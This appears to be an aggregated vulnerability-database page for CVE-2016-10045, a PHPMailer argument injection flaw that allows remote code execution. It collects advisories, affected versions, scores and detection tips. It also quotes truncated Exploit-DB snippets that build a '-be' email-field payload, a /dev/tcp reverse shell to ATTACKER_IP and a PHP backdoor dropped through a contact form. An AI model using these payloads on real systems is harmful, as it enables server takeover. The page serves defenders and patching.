CVE-2016-10045
published 2016-12-30CVE-2016-10045: The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary…
PriorityP182critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
98.04%
99.9th percentile
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-phpmailer | — | — |
| joomla | joomla_! | 1.5.0 – 3.6.5 | — |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.18 | 5.2.18 |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.20 | 5.2.20 |
| phpmailer_project | phpmailer | < 5.2.20 | 5.2.20 |
| wordpress | wordpress | <= 4.7 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP POST requests to contact form endpoints where the email field contains `-be` (Exim/sendmail argument injection flag) combined with `/dev/tcp/` reverse shell strings — indicative of active exploitation. ↗
- →The Metasploit module for this CVE writes a payload file to the web root and then triggers it via HTTP request; detect unexpected new PHP files appearing in the web root combined with outbound connections from the web server process. ↗
- →The vulnerability stems from improper interaction between escapeshellarg and PHP's internal mail() escaping; audit PHPMailer versions below 5.2.20 using isMail transport for unpatched deployments. ↗
- ·CVE-2016-10045 exists specifically because the patch for CVE-2016-10033 was incomplete; systems patched only to PHPMailer 5.2.18/5.2.19 remain vulnerable — the fix requires 5.2.20 or later. ↗
- ·Only the isMail transport (using PHP's built-in mail() function) is affected; SMTP transport is not vulnerable to this argument injection vector. ↗
- ·Exploitation requires the web server user running PHPMailer to have write access to the web root directory for the file-drop technique used by the Metasploit module. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8LOW
vendor_ubuntu9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
libphp-phpmailer vulnerability
osv·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] libphp-phpmailer vulnerability
libphp-phpmailer vulnerability
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yo
OSV
libphp-phpmailer vulnerabilities
osv·2023-03-15·CVSS 9.8
CVE-2016-10033 [CRITICAL] libphp-phpmailer vulnerabilities
libphp-phpmailer vulnerabilities
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when adding attachments to messages,
which could lead to relative im
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] CWE-77 Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
OSV
CVE-2016-10045: The isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: The isMail transport in PHPMailer before 5
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Ubuntu
PHPMailer vulnerabilities
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2021-3603 [CRITICAL] PHPMailer vulnerabilities
Title: PHPMailer vulnerabilities
Summary: Several security issues were fixed in PHPMailer.
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when addi
Ubuntu
PHPMailer vulnerability
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] PHPMailer vulnerability
Title: PHPMailer vulnerability
Summary: An incomplete fix was discovered in PHPMailer.
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ub
Debian
CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
vendor_debian·2016·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
PHPMailer < 5.2.20 - Remote Code Execution
exploitdb·2016-12-27·CVSS 9.8
CVE-2016-10045 [CRITICAL] PHPMailer < 5.2.20 - Remote Code Execution
PHPMailer "
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
Exploit-DB
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-1004 [CRITICAL] PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
PHPMailer 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
writes a payload to the web root of the webserver before then executing
it with an HTTP request. The user running PHPMailer must have write
access to the specified WEB_ROOT directory and successful exploitation
can take a few minutes.
},
'Author' => [
'Dawid Golunski', # vulnerability discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB',
Metasploit
PHPMailer Sendmail Argument Injection
metasploit
PHPMailer Sendmail Argument Injection
PHPMailer Sendmail Argument Injection
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.
Bugzilla
CVE-2016-10045 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-11·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045 phpmailer: Parameter injection via mail() function
CVE-2016-10045 phpmailer: Parameter injection via mail() function
The isMail transport in PHPMailer before 5.2.20, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
References:
http://seclists.org/oss-sec/2016/q4/771
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
Bugzilla
CVE-2016-10033 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 phpmailer: Parameter injection via mail() function
CVE-2016-10033 phpmailer: Parameter injection via mail() function
A vulnerability was found in PHPMailer. This code is being used in multiple web applications. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/750
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1409494]
Affects: fedora-all [bug 1409495]
Affects: epel-all [bug 1409496]
---
Created wordpress tracking bugs for this issue:
Affects: fedora-all [bug 1409497]
Affects: epel-all [bug 1409498]
---
Created mantis tracking bugs for this issue:
Affects: fedora-all [bug 1409492]
Affe
http://openwall.com/lists/oss-security/2016/12/28/1http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.htmlhttp://seclists.org/fulldisclosure/2016/Dec/81http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injectionhttp://www.securityfocus.com/archive/1/539967/100/0/threadedhttp://www.securityfocus.com/bid/95130http://www.securitytracker.com/id/1037533https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.htmlhttps://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilitieshttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.htmlhttps://www.exploit-db.com/exploits/40969/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/http://openwall.com/lists/oss-security/2016/12/28/1http://packetstormsecurity.com/files/140286/PHPMailer-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.htmlhttp://seclists.org/fulldisclosure/2016/Dec/81http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injectionhttp://www.securityfocus.com/archive/1/539967/100/0/threadedhttp://www.securityfocus.com/bid/95130http://www.securitytracker.com/id/1037533https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.htmlhttps://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.20https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilitieshttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.htmlhttps://www.exploit-db.com/exploits/40969/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/
2016-12-30
Published